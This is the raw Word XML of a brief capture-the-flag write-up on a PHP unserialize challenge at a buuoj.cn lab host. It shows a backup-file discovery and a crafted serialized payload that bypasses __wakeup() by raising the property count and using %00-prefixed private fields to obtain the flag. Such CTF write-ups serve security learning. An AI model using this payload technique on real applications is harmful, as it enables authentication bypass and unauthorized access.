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99527" w14:textId="4CB8612D" w:rsidR="00045AB7" w:rsidRDefault="004D2141">
      <w:r w:rsidRPr="004D2141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="542DE35F" wp14:editId="27E19FC6">
            <wp:extent cx="3773882" cy="87236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319" cy="88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EC30" w14:textId="1895DC69" w:rsidR="004D2141" w:rsidRDefault="004D2141"/>
    <w:p w14:paraId="48355BFF" w14:textId="31B5FC97" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>earch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and file backup </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7EDF8" w14:textId="1973D22D" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="004D2141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BF40511" wp14:editId="79FA21A4">
            <wp:extent cx="5274310" cy="188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CA10" w14:textId="2E56385B" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>ind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE82905" w14:textId="3CBCBFFE" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r w:rsidRPr="004D2141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406FC7A2" wp14:editId="409E7178">
            <wp:extent cx="5274310" cy="936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650E" w14:textId="77777777" w:rsidR="004D2141" w:rsidRDefault="004D2141"/>
    <w:p w14:paraId="301E514F" w14:textId="5B910F57" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A720EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://ca37728c-e6e1-4561-9332-8acc5032c9eb.node4.buuoj.cn:81/www.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20513F10" w14:textId="77777777" w:rsidR="004D2141" w:rsidRDefault="004D2141"/>
    <w:p w14:paraId="05C7B645" w14:textId="7B5FABDD" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r>
        <w:t xml:space="preserve">And download </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00A720EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>www.zip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and extract it get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D1A40" w14:textId="49355529" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E10D1F3" wp14:editId="2804CF4A">
            <wp:extent cx="5274310" cy="9639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B6B9" w14:textId="2A4C367D" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r>
        <w:t>See each php file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D32EFA" w14:textId="5CABC935" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B885EA2" w14:textId="4552EDC4" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r w:rsidRPr="004D2141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FA0E78" wp14:editId="2F09E969">
            <wp:extent cx="4220164" cy="905001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472E" w14:textId="6257BA2C" w:rsidR="004D2141" w:rsidRDefault="004D2141"/>
    <w:p w14:paraId="5A8E17C1" w14:textId="7C819277" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9478B8" w14:textId="7C73A54E" w:rsidR="004D2141" w:rsidRDefault="004D2141">
      <w:r w:rsidRPr="004D2141">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="262B1144" wp14:editId="5D422063">
            <wp:extent cx="4105848" cy="1400370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8AA0" w14:textId="580436BB" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et input and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12659F58" w14:textId="77777777" w:rsidR="00617504" w:rsidRDefault="00617504"/>
    <w:p w14:paraId="67B14F10" w14:textId="77777777" w:rsidR="00617504" w:rsidRDefault="00617504"/>
    <w:p w14:paraId="7B9998D8" w14:textId="3B4D0877" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="154A9845" w14:textId="4D604ED9" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:r w:rsidRPr="00617504">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6986E777" wp14:editId="33B8A35F">
            <wp:extent cx="5274310" cy="19151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C4C9" w14:textId="695EFD3F" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617504">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C263AD7" wp14:editId="61AC4BF4">
            <wp:extent cx="4172532" cy="111458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8760" w14:textId="03E67B23" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:r w:rsidRPr="00617504">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0E9008" wp14:editId="73DFF733">
            <wp:extent cx="5274310" cy="3169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A770" w14:textId="4498040A" w:rsidR="00617504" w:rsidRDefault="00617504"/>
    <w:p w14:paraId="16DFDAE3" w14:textId="0BD81DFA" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>ere get the Name class and set username=’admin’ and password=100 then echo $flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473B92F" w14:textId="6693F592" w:rsidR="00617504" w:rsidRDefault="00617504"/>
    <w:p w14:paraId="5540D667" w14:textId="7D02C799" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ut in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the input is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, so we should first serialize Name(‘admin’,100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB0393B" w14:textId="61A5D596" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>onstruct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020E32B1" w14:textId="59716DB8" w:rsidR="00617504" w:rsidRDefault="00634ACF">
      <w:r w:rsidRPr="00634ACF">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8B108B" wp14:editId="44DDC1F7">
            <wp:extent cx="5274310" cy="15360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597A" w14:textId="42C788FD" w:rsidR="00617504" w:rsidRDefault="00617504"/>
    <w:p w14:paraId="7BDF2860" w14:textId="426C6789" w:rsidR="00617504" w:rsidRDefault="00617504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>hen</w:t>
      </w:r>
      <w:r w:rsidR="00634ACF">
        <w:t xml:space="preserve"> input is </w:t>
      </w:r>
      <w:r w:rsidR="00634ACF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
        <w:t>O:4:"Name":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00634ACF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
        <w:t>2:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00634ACF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
        <w:t>s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0341E3AE" w14:textId="33A081EC" w:rsidR="00634ACF" w:rsidRDefault="00634ACF"/>
    <w:p w14:paraId="2FA507E9" w14:textId="5C4560DA" w:rsidR="00634ACF" w:rsidRDefault="00634ACF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>ext should bypass __</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wakeup(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA16F26" w14:textId="5554256D" w:rsidR="00634ACF" w:rsidRDefault="00634ACF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r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O</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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:4:"Name":</w:t>
      </w:r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3</w:t>
      </w:r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:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182CAED3" w14:textId="77777777" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3449D0D7" w14:textId="77777777" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:r w:rsidRPr="00C84E79">
        <w:t>Field names for private fields When serialized, both class and field names are prefixed with \0 (that is, %00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CCA213" w14:textId="7944FB01" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="78CF8A"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">set  </w:t>
      </w:r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O</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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:4:"Name":3:{s:14:"</w:t>
      </w:r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%00</w:t>
      </w:r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Name</w:t>
      </w:r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%00</w:t>
      </w:r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username";s:5:"admin";s:14:"</w:t>
      </w:r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%00</w:t>
      </w:r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Name</w:t>
      </w:r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%00</w:t>
      </w:r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password";i:100;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E5929" w14:textId="4C8F6737" w:rsidR="00C84E79" w:rsidRDefault="00C84E79"/>
    <w:p w14:paraId="34778358" w14:textId="75AEA38B" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ast input is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C51417" w14:textId="3B380136" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:r>
        <w:t>?select=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84E79">
        <w:t>O:4:"Name":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C84E79">
        <w:t>3:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C84E79">
        <w:t>s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9345B0" w14:textId="22E55F4F" w:rsidR="00C84E79" w:rsidRDefault="00C84E79"/>
    <w:p w14:paraId="5486229B" w14:textId="19EA3F1B" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>nd get flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83C08E" w14:textId="4555B1A4" w:rsidR="00C84E79" w:rsidRDefault="00C84E79">
      <w:r w:rsidRPr="00C84E79">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470C9C42" wp14:editId="3D000893">
            <wp:extent cx="5274310" cy="8026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A9F0" w14:textId="1D4751C1" w:rsidR="00C84E79" w:rsidRPr="00C84E79" w:rsidRDefault="00C84E79" w:rsidP="00C84E79">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84E79">
        <w:rPr>
          <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>flag{33ac5002-f924-4165-a2dc-ca6c46e786b5}</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00C84E79" w:rsidRPr="00C84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AB"/>
    <w:rsid w:val="00045AB7"/>
    <w:rsid w:val="002B09AB"/>
    <w:rsid w:val="004D2141"/>
    <w:rsid w:val="00617504"/>
    <w:rsid w:val="00634ACF"/>
    <w:rsid w:val="00C8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47A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E7276B24-23B7-47BD-9A45-260CB9C7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1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2141"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00617504"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C84E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ip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a37728c-e6e1-4561-9332-8acc5032c9eb.node4.buuoj.cn:81/www.zip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长彬</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>陆 长彬</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-06T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-06T09:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>